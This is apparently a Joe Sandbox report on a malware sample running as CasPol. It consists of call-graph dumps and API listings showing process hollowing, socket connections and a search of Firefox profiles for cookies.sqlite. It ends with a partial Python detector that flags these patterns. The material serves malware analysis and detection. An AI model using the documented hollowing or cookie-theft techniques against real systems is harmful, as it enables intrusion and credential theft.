69546->69527 69555 411cac 69547->69555 69548 41ab38 42 API calls 69548->69555 69549 40c854 32 API calls 69549->69555 69550 401eea 11 API calls 69550->69555 69551 403b40 28 API calls 69551->69555 69552 403cbb 28 API calls 69552->69555 69553 403cdc 28 API calls 69553->69555 69554 4028cf 28 API calls 69554->69555 69555->69548 69555->69549 69555->69550 69555->69551 69555->69552 69555->69553 69555->69554 69556 401e13 11 API calls 69555->69556 69557 411dea Sleep 69555->69557 69558 4176b6 31 API calls 69555->69558 69559 411e8c Sleep 69555->69559 69560 411f2e Sleep 69555->69560 69561 411f90 DeleteFileW 69555->69561 69562 41b61a 32 API calls 69555->69562 69563 411fc7 DeleteFileW 69555->69563 69564 412019 Sleep 69555->69564 69565 412003 DeleteFileW 69555->69565 69566 412092 69555->69566 69573 41205e Sleep 69555->69573 69556->69555 69557->69555 69558->69555 69559->69555 69560->69555 69561->69555 69562->69555 69563->69555 69564->69555 69565->69555 69567 401e13 11 API calls 69566->69567 69568 41209e 69567->69568 69569 401e13 11 API calls 69568->69569 69570 4120aa 69569->69570 69571 401e13 11 API calls 69570->69571 69572 4120b6 69571->69572 69707 40b027 69572->69707 69575 401e13 11 API calls 69573->69575 69580 41206e 69575->69580 69576 4120c9 69578 401fbd 28 API calls 69576->69578 69577 401e13 11 API calls 69577->69580 69579 4120e9 69578->69579 69711 4123f7 69579->69711 69580->69555 69580->69577 69582 412090 69580->69582 69582->69572 69585 412100 69586 412125 69585->69586 69587 412274 69585->69587 69727 41aec8 69586->69727 69588 41aec8 28 API calls 69587->69588 69590 41227d 69588->69590 69592 4027ec 28 API calls 69590->69592 69594 4122b2 69592->69594 69596 4027cb 28 API calls 69594->69596 69598 4122c1 69596->69598 69597 4027ec 28 API calls 69599 412176 69597->69599 69600 4027cb 28 API calls 69598->69600 69601 4027cb 28 API calls 69599->69601 69602 4122cd 69600->69602 69603 412185 69601->69603 69604 4027cb 28 API calls 69602->69604 69605 4027cb 28 API calls 69603->69605 69606 
4122dc 69604->69606 69607 412194 69605->69607 69608 4027cb 28 API calls 69606->69608 69609 4027cb 28 API calls 69607->69609 69610 4122eb 69608->69610 69611 4121a3 69609->69611 69612 4027cb 28 API calls 69610->69612 69613 4027cb 28 API calls 69611->69613 69614 4122fa 69612->69614 69615 4121b2 69613->69615 69617 4027cb 28 API calls 69614->69617 69616 4027cb 28 API calls 69615->69616 69619 4121be 69616->69619 69618 412309 69617->69618 69738 40275c 28 API calls 69618->69738 69621 4027cb 28 API calls 69619->69621 69623 4121ca 69621->69623 69622 412313 69624 404468 61 API calls 69622->69624 69736 40275c 28 API calls 69623->69736 69626 412320 69624->69626 69628 401eea 11 API calls 69626->69628 69627 4121d9 69629 4027cb 28 API calls 69627->69629 69630 41232c 69628->69630 69631 4121e5 69629->69631 69632 401eea 11 API calls 69630->69632 69737 40275c 28 API calls 69631->69737 69634 412338 69632->69634 69636 401eea 11 API calls 69634->69636 69635 4121ef 69637 404468 61 API calls 69635->69637 69638 412344 69636->69638 69639 4121fc 69637->69639 69640 401eea 11 API calls 69638->69640 69641 401eea 11 API calls 69639->69641 69642 412350 69640->69642 69643 412205 69641->69643 69644 401eea 11 API calls 69642->69644 69645 401eea 11 API calls 69643->69645 69646 412359 69644->69646 69647 41220e 69645->69647 69649 401eea 11 API calls 69646->69649 69648 401eea 11 API calls 69647->69648 69651 412217 69648->69651 69650 412362 69649->69650 69652 401eea 11 API calls 69650->69652 69653 401eea 11 API calls 69651->69653 69654 412268 69652->69654 69655 412220 69653->69655 69657 401eea 11 API calls 69654->69657 69656 401eea 11 API calls 69655->69656 69658 41222c 69656->69658 69659 412374 69657->69659 69660 401eea 11 API calls 69658->69660 69661 401e13 11 API calls 69659->69661 69662 412238 69660->69662 69663 412380 69661->69663 69664 401eea 11 API calls 69662->69664 69665 401eea 11 API calls 69663->69665 69666 412244 69664->69666 69667 41238c 69665->69667 69668 401eea 11 API calls 69666->69668 
69669 401eea 11 API calls 69667->69669 69670 412250 69668->69670 69671 412398 69669->69671 69672 401eea 11 API calls 69670->69672 69673 401eea 11 API calls 69671->69673 69674 41225c 69672->69674 69675 4123a4 69673->69675 69676 401eea 11 API calls 69674->69676 69677 401eea 11 API calls 69675->69677 69676->69654 69678 4123b0 69677->69678 69679 401eea 11 API calls 69678->69679 69680 4123bc 69679->69680 69681 401eea 11 API calls 69680->69681 69682 4123c8 69681->69682 69683 401eea 11 API calls 69682->69683 69684 4123d4 69683->69684 69685 401eea 11 API calls 69684->69685 69686 4123e0 69685->69686 69687 401eea 11 API calls 69686->69687 69688 411c50 69687->69688 69688->69477 69690 403c39 69689->69690 69693 403c59 69690->69693 69694 403c68 69693->69694 69699 4032a4 69694->69699 69696 403c74 69697 402325 28 API calls 69696->69697 69698 403b73 69697->69698 69698->69438 69700 4032b0 69699->69700 69701 4032ad 69699->69701 69704 4032b6 22 API calls 69700->69704 69701->69696 69705->69528 69706->69546 69708 40b02f 69707->69708 69739 40b04b 69708->69739 69710 40b045 69710->69576 69712 412435 69711->69712 69714 412406 69711->69714 69713 412444 69712->69713 69748 4571c5b 69712->69748 69744 403b40 69713->69744 69752 410b0d 69714->69752 69719 401eea 11 API calls 69721 4120f4 69719->69721 69723 401e13 69721->69723 69725 402121 69723->69725 69724 402150 69724->69585 69725->69724 69899 402718 11 API calls _Deallocate 69725->69899 69728 41aed5 69727->69728 69729 401f86 28 API calls 69728->69729 69730 412131 69729->69730 69731 41ad46 69730->69731 69900 440c51 69731->69900 69734 401f66 28 API calls 69735 412146 69734->69735 69735->69597 69736->69627 69737->69635 69738->69622 69740 40b055 69739->69740 69742 40b060 69740->69742 69743 40b138 28 API calls 69740->69743 69742->69710 69743->69742 69745 403b48 69744->69745 69765 403b7a 69745->69765 69749 4571c6b ___scrt_fastfail 69748->69749 69774 45712ee 69749->69774 69751 4571c87 69751->69713 69816 410b19 69752->69816 69755 410d8d 69758 410dd4 
69755->69758 69759 410daf 69755->69759 69756 410ea0 SetLastError 69757 410e90 69756->69757 69757->69712 69758->69756 69758->69757 69759->69758 69761 43a88c ___std_exception_copy 21 API calls 69759->69761 69764 410e60 69759->69764 69762 410e0c 69761->69762 69762->69758 69762->69762 69897 43fdd0 20 API calls 3 library calls 69762->69897 69898 4404b8 20 API calls 3 library calls 69764->69898 69766 403b86 69765->69766 69769 403b9e 69766->69769 69768 403b5a 69768->69719 69770 403ba8 69769->69770 69772 403bb3 69770->69772 69773 403cfd 28 API calls 69770->69773 69772->69768 69773->69772 69775 4571324 ___scrt_fastfail 69774->69775 69776 45713b7 GetEnvironmentVariableW 69775->69776 69800 45710f1 69776->69800 69779 45710f1 57 API calls 69780 4571465 69779->69780 69781 45710f1 57 API calls 69780->69781 69782 4571479 69781->69782 69783 45710f1 57 API calls 69782->69783 69784 457148d 69783->69784 69785 45710f1 57 API calls 69784->69785 69786 45714a1 69785->69786 69787 45710f1 57 API calls 69786->69787 69788 45714b5 lstrlenW 69787->69788 69789 45714d2 69788->69789 69790 45714d9 lstrlenW 69788->69790 69789->69751 69791 45710f1 57 API calls 69790->69791 69792 4571501 lstrlenW lstrcatW 69791->69792 69793 45710f1 57 API calls 69792->69793 69794 4571539 lstrlenW lstrcatW 69793->69794 69795 45710f1 57 API calls 69794->69795 69796 457156b lstrlenW lstrcatW 69795->69796 69797 45710f1 57 API calls 69796->69797 69798 457159d lstrlenW lstrcatW 69797->69798 69799 45710f1 57 API calls 69798->69799 69799->69789 69801 4571118 ___scrt_fastfail 69800->69801 69802 4571129 lstrlenW 69801->69802 69813 4572c40 69802->69813 69805 4571177 lstrlenW FindFirstFileW 69807 45711e1 69805->69807 69808 45711a0 69805->69808 69806 4571168 lstrlenW 69806->69805 69807->69779 69809 45711c7 FindNextFileW 69808->69809 69810 45711aa 69808->69810 69809->69808 69812 45711da FindClose 69809->69812 69810->69809 69815 4571000 57 API calls ___scrt_fastfail 69810->69815 69812->69807 69814 4571148 lstrcatW lstrlenW 
69813->69814 69814->69805 69814->69806 69815->69810 69849 4105b9 69816->69849 69818 410b38 69819 410b15 69818->69819 69821 4105b9 SetLastError 69818->69821 69834 410c1f SetLastError 69818->69834 69819->69755 69823 410b5f 69821->69823 69822 410bbf GetNativeSystemInfo 69824 410bd6 69822->69824 69823->69819 69823->69822 69823->69823 69823->69834 69824->69834 69852 410abe VirtualAlloc 69824->69852 69826 410bfe 69827 410c26 GetProcessHeap HeapAlloc 69826->69827 69876 410abe VirtualAlloc 69826->69876 69829 410c3d 69827->69829 69830 410c4f 69827->69830 69877 410ad5 VirtualFree 69829->69877 69833 4105b9 SetLastError 69830->69833 69831 410c16 69831->69827 69831->69834 69835 410c98 69833->69835 69834->69819 69836 410d45 69835->69836 69853 410abe VirtualAlloc 69835->69853 69878 410eb0 GetProcessHeap HeapFree 69836->69878 69839 410cb1 _Yarn 69854 4105cc 69839->69854 69841 410cdd 69841->69836 69858 410975 69841->69858 69845 410d0f 69845->69819 69845->69836 69872 1000ad8d 69845->69872 69846 410d36 69846->69819 69847 410d3a SetLastError 69846->69847 69847->69836 69850 4105c8 69849->69850 69851 4105bd SetLastError 69849->69851 69850->69818 69851->69818 69852->69826 69853->69839 69856 4106a6 69854->69856 69857 4105fd _Yarn ___scrt_fastfail 69854->69857 69855 4105b9 SetLastError 69855->69857 69856->69841 69857->69855 69857->69856 69859 410a88 69858->69859 69864 410996 69858->69864 69859->69836 69866 410769 69859->69866 69860 410a9d SetLastError 69860->69859 69863 410a8a SetLastError 69863->69859 69864->69859 69864->69860 69864->69863 69879 43fcda 69864->69879 69868 410790 69866->69868 69867 4106d3 VirtualProtect 69869 410891 69867->69869 69868->69869 69871 41087f 69868->69871 69892 4106d3 69868->69892 69869->69845 69871->69867 69873 1000ad96 69872->69873 69874 1000ad9b dllmain_dispatch 69872->69874 69896 1000b15b GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 69873->69896 69874->69846 69876->69831 69877->69834 69878->69819 69880 44b9be 
69879->69880 69881 44b9d6 69880->69881 69882 44b9cb 69880->69882 69884 44b9de 69881->69884 69890 44b9e7 _strftime 69881->69890 69883 446aff _strftime 21 API calls 69882->69883 69889 44b9d3 69883->69889 69885 446ac5 _free 20 API calls 69884->69885 69885->69889 69886 44ba11 RtlReAllocateHeap 69886->69889 69886->69890 69887 44b9ec 69888 445354 _free 20 API calls 69887->69888 69888->69889 69889->69864 69890->69886 69890->69887 69891 442200 std::_Facet_Register 7 API calls 69890->69891 69891->69890 69893 4106dd 69892->69893 69895 4106e8 69892->69895 69894 410722 VirtualProtect 69893->69894 69893->69895 69894->69895 69895->69868 69896->69874 69897->69764 69898->69758 69899->69724 69901 440c5d 69900->69901 69904 440a4d 69901->69904 69903 41ad67 69903->69734 69905 440a64 69904->69905 69907 440a9b __cftoe 69905->69907 69908 445354 20 API calls _free 69905->69908 69907->69903 69908->69907 69910 1000dafb ___std_exception_copy 21 API calls 69909->69910 69911 100010a2 69910->69911 69912 100010e3 69911->69912 69917 100010f6 69911->69917 69921 1000daab 26 API calls _abort 69911->69921 69913 100010ea 69912->69913 69922 1000daab 26 API calls _abort 69912->69922 69915 100010f1 69913->69915 69923 1000daab 26 API calls _abort 69913->69923 69915->69917 69924 1000daab 26 API calls _abort 69915->69924 69917->69505 69928 403340 69925->69928 69930 403348 69928->69930 69929 402662 69929->69404 69930->69929 69932 4038c2 69930->69932 69935 4038cb 69932->69935 69936 401eea 11 API calls 69935->69936 69937 4038ca 69936->69937 69937->69930 69939 401fbd 28 API calls 69938->69939 69940 414bbd SetEvent 69939->69940 69941 414bd2 69940->69941 69942 403b60 28 API calls 69941->69942 69943 414bec 69942->69943 69944 401fbd 28 API calls 69943->69944 69945 414bfc 69944->69945 69946 401fbd 28 API calls 69945->69946 69947 414c0e 69946->69947 69948 41afc3 28 API calls 69947->69948 69949 414c17 69948->69949 69950 414d99 69949->69950 69951 414c37 GetTickCount 69949->69951 70014 414d8a 69949->70014 69950->70014 
Control-flow graph (node and edge data of the rendered graph omitted). API calls visible in the graphed functions: GetLastInputInfo, GetTickCount, GetForegroundWindow, GetWindowTextW, GetLocalTime, CreateEventA, CreateThread, getaddrinfo, socket, connect, closesocket, FreeAddrInfoW, FormatMessageA, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, CreateProcessW, TerminateProcess, WaitForSingleObject, CloseHandle, InternetOpenW, InternetOpenUrlW, InternetReadFile, InternetCloseHandle, GetModuleHandleA, GetProcAddress, LoadLibraryA, VirtualProtect, IsProcessorFeaturePresent, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, GetModuleFileNameW, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, FindResourceA, LoadResource, LockResource, SizeofResource.

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
• GetProcAddress.KERNEL32(00000000), ref: 0041BD01
• GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
• GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
• LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
• GetProcAddress.KERNEL32(00000000), ref: 0041BD30
• LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
• GetProcAddress.KERNEL32(00000000), ref: 0041BD44
• LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
• GetProcAddress.KERNEL32(00000000), ref: 0041BD58
• LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
• GetProcAddress.KERNEL32(00000000), ref: 0041BD68
• GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
• GetProcAddress.KERNEL32(00000000), ref: 0041BD78
• GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
• GetProcAddress.KERNEL32(00000000), ref: 0041BD88
• LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
• GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
• GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
• GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
• GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
• GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
• GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
• GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
• GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
• GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
• GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
• GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
• LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
• GetProcAddress.KERNEL32(00000000), ref: 0041BE09
• LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
• GetProcAddress.KERNEL32(00000000), ref: 0041BE19
• GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
• GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
• GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
• GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
• GetProcAddress.KERNEL32(00000000), ref: 0041BE53
• LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
• GetProcAddress.KERNEL32(00000000), ref: 0041BE63
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: AddressProc$HandleLibraryLoadModule
• String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
• API String ID: 384173800-625181639
• Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
• Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
• Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
• Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE

Control-flow Graph

Control-flow graph for the function at 417245 (node and edge data of the rendered graph omitted). API calls visible in the graphed blocks, in block order: GetModuleHandleA, GetProcAddress, CreateProcessW, GetLastError, VirtualAlloc, Wow64GetThreadContext, ReadProcessMemory, NtCreateSection, NtUnmapViewOfSection, NtMapViewOfSection, GetCurrentProcess, VirtualFree, NtClose, TerminateProcess, WriteProcessMemory, Wow64SetThreadContext, ResumeThread.
APIs
• GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
• GetProcAddress.KERNEL32(00000000), ref: 0041728F
• GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
• GetProcAddress.KERNEL32(00000000), ref: 004172A3
• GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
• GetProcAddress.KERNEL32(00000000), ref: 004172B7
• GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
• GetProcAddress.KERNEL32(00000000), ref: 004172CB
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
• VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
• Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
• ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
• NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004173E6
• NtUnmapViewOfSection.NTDLL(?,?), ref: 0041740E
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041742E
• VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00417440
• NtClose.NTDLL(?), ref: 0041744A
• TerminateProcess.KERNEL32(?,00000000), ref: 00417454
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
• NtMapViewOfSection.NTDLL(?,00000000), ref: 00417496
• WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00417575
• ResumeThread.KERNEL32(?), ref: 00417582
• VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
• GetCurrentProcess.KERNEL32(?), ref: 004175A5
• NtUnmapViewOfSection.NTDLL(00000000), ref: 004175AC
• NtClose.NTDLL(?), ref: 004175B6
• TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
• GetLastError.KERNEL32 ref: 004175C7
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmapWow64$AllocErrorLastReadResumeWrite
• String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`Wu$ntdll
• API String ID: 3150337530-529412701
• Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
• Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
• Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
• Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A

Control-flow Graph

Control-flow graph of the function at 100012cb (rendered as a graph in the report; the edge list is omitted here). The function spans 100012cb-10001ed0, is dominated by calls to internal subroutines (10003a70, 10004160, 10003b90, 100025a0, 10004c10, 1000a956 and others, many of them repeated), and contains two loops that call Sleep (at 1000180b and 10001afb). Its string references, listed below, include chrome.exe, msedge.exe and opera.exe.
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: ExistsFilePath
• String ID: 0$RPe%$chrome.exe$invalid vector<T> subscript$msedge.exe$opera.exe$/L$TS$YM
• API String ID: 1174141254-1233981215
• Opcode ID: 22eea768eb0ac1053ae5efbe52efbd381925fc3d587047621c43a0140cdd6f4b
• Instruction ID: ec441cf6cc5d574dc3d9e533db66c2798fe9b2d1f890f10e919fe81ba7d73607
• Opcode Fuzzy Hash: 22eea768eb0ac1053ae5efbe52efbd381925fc3d587047621c43a0140cdd6f4b
• Instruction Fuzzy Hash: 4572D174D00208DBFB19DB64CC55BEE77B5EF41344F208198E406AB296DB71AF49CBA2
APIs
• FindFirstFileW.KERNEL32(00000000,-00000002,-00000002), ref: 10005CB2
• FindNextFileW.KERNEL32(00000000,?), ref: 10005D2C
• PathFileExistsW.SHLWAPI(?), ref: 10005E68
• FindNextFileW.KERNEL32(00000000,00000010), ref: 10005E8C
• FindClose.KERNEL32(00000000), ref: 10005E97
• FindClose.KERNEL32(00000000), ref: 10005EDA
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: Find$File$CloseNext$ExistsFirstPath
• String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
• API String ID: 913281501-405221262
• Opcode ID: dae22583316b56d6af3c3b4fe4f33958d0cea0f6db4385a305567ebe6521a2a8
• Instruction ID: d69103c2b3bb7b0ef1279a73142a9cc332cbad18a963587697917916d0a93de4
• Opcode Fuzzy Hash: dae22583316b56d6af3c3b4fe4f33958d0cea0f6db4385a305567ebe6521a2a8
• Instruction Fuzzy Hash: 8181D270D00249DAFB14DFA0DC49BEEB7B5FF14385F61416AE805A7255EB32AE44CB20
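Added example, not part of the Joe Sandbox report. The API listing for the function at 417245 above is the process-hollowing sequence: CreateProcessW with dwCreationFlags 00000004 (CREATE_SUSPENDED), ReadProcessMemory of 4 bytes from the suspended child (presumably the image base out of its PEB), NtCreateSection with SEC_COMMIT (08000000) and PAGE_EXECUTE_READWRITE (00000040), NtUnmapViewOfSection and NtMapViewOfSection to replace the child's image with a view of that section (also mapped into the current process via GetCurrentProcess, so it can be filled locally), WriteProcessMemory, Wow64SetThreadContext to redirect the thread, and ResumeThread. The listing whose APIs begin at ref 10005CB2 walks a directory built from AppData and \Mozilla\Firefox\Profiles\ with FindFirstFileW/FindNextFileW and checks for cookies.sqlite with PathFileExistsW. The Python below parses the report's "• Api.Module(args), ref: addr" and "• String ID:" bullets and flags both patterns; the two listings are embedded as constructed input, trimmed to the relevant calls. The parser, the staged rule, the marker list and the extra equivalent API names (NtWriteVirtualMemory, NtSetContextThread, NtResumeThread) are my assumptions, not something the report provides. Caveat: the listing is in address order, a static view of the function; the Executed/Not Executed colouring of the report's graph, which does not survive in text, is what says whether the path ran, so a hit here establishes capability, not execution.

```python
import re
from dataclasses import dataclass

# dwCreationFlags bit that starts the child suspended (Win32 constant).
CREATE_SUSPENDED = 0x00000004

# Constructed input: bullets copied from this report section, trimmed to the
# calls the rules need, in the report's own "• Api.Module(args), ref: addr" form.
HOLLOWING_DUMP = r"""
• GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
• GetProcAddress.KERNEL32(00000000), ref: 0041728F
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
• VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
• Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
• ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
• NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004173E6
• NtUnmapViewOfSection.NTDLL(?,?), ref: 0041740E
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041742E
• WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 00417575
• ResumeThread.KERNEL32(?), ref: 00417582
• GetLastError.KERNEL32 ref: 004175C7
• String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`Wu$ntdll
"""

FIREFOX_DUMP = r"""
• FindFirstFileW.KERNEL32(00000000,-00000002,-00000002), ref: 10005CB2
• FindNextFileW.KERNEL32(00000000,?), ref: 10005D2C
• PathFileExistsW.SHLWAPI(?), ref: 10005E68
• FindClose.KERNEL32(00000000), ref: 10005E97
• String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
"""

# Assumed line shapes; the parenthesised argument list is absent for no-arg calls.
API_LINE = re.compile(r"^•\s*(\w+)\.(\w+)(?:\((.*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)\s*$")
STRING_LINE = re.compile(r"^•\s*String ID:\s*(.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: int


def parse_dump(text):
    """Parse report bullets into (calls in listing order, referenced strings)."""
    calls, strings = [], []
    for line in text.splitlines():
        line = line.strip()
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m.group(3).split(",")] if m.group(3) else []
            calls.append(ApiCall(m.group(1), m.group(2), args, int(m.group(4), 16)))
            continue
        m = STRING_LINE.match(line)
        if m:
            strings.extend(s for s in m.group(1).split("$") if s)
    return calls, strings


def arg_int(args, index):
    """Hex argument at `index`, or None when the report shows '?' (unresolved)."""
    if index < len(args) and re.fullmatch(r"-?[0-9A-Fa-f]+", args[index]):
        return int(args[index], 16)
    return None


# Stage sets: the report's names plus assumed native equivalents.
REMOTE_WRITE = {"WriteProcessMemory", "NtWriteVirtualMemory", "NtMapViewOfSection",
                "ZwMapViewOfSection", "NtUnmapViewOfSection", "ZwUnmapViewOfSection"}
SET_CONTEXT = {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"}
RESUME = {"ResumeThread", "NtResumeThread"}


def find_hollowing(calls):
    """Evidence chain for process hollowing in listing order, or None.

    CreateProcess* with CREATE_SUSPENDED in its 6th argument, then a remote image
    replacement or write, then a thread-context rewrite, then a resume.
    """
    stage, evidence = 0, []
    for c in calls:
        if stage == 0 and c.name.startswith("CreateProcess"):
            flags = arg_int(c.args, 5)
            if flags is not None and flags & CREATE_SUSPENDED:
                stage, evidence = 1, [c]
        elif stage == 1 and c.name in REMOTE_WRITE:
            stage, evidence = 2, evidence + [c]
        elif stage == 2 and c.name in SET_CONTEXT:
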